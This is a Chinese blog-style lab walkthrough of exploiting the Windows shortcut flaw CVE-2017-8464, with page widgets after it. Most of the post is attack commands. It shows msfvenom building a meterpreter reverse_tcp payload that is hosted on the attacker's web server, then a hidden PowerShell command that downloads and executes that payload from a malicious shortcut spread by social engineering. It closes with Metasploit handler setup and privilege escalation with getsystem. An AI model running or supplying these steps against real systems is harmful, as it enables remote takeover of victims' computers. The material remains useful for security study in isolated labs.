震网三代(CVE-2017-8464)

CVE-2017-8464

说明:
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危
传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

危害:
被攻击机插入存在攻击lnk的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。

环境准备

Win7:192.168.202.136

在这里插入图片描述
Kali:192.168.202.133

在这里插入图片描述

利用原理

创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒,并且被远控。

漏洞利用

启动MSF
终端内输入:msfconsole
在这里插入图片描述

开始利用:
使用MSF创建一个后门
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.202.133 lport=4664 -f psh-reflection>/var/www/html/link.ps1

在这里插入图片描述

在kali下开启apache2
service apache2 start
在这里插入图片描述

通过社会学进行快捷方式传播
powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.202.133/link.ps1’);test.ps1”
在这里插入图片描述在这里插入图片描述

回到MSF终端配置监听
use exploit/multi/handler
配置payload
set payload windows/x64/meterpreter/reverse_tcp
options
在这里插入图片描述

设置 LHOST 和 LPORT
set lhost <当前机器ip> 设置 LHOST
set lport <未被占用的端口> 设置 LPORT
最后在 输入 options 查看配置是否生效

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-czJcCMuj-1648719875555)(一、 什么是 CVE-2017-8464:.assets/1641972233527.png)]

执行监听

run 或者 exploit,在靶机上执行快捷方式
稍等片刻获取到meterpreter
在这里插入图片描述

后渗透

进入终端:shell
在这里插入图片描述
查看IP:ip a
在这里插入图片描述

发现有乱码
输入chcp 65001
在这里插入图片描述

退出,提权:getsystem
在这里插入图片描述

  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值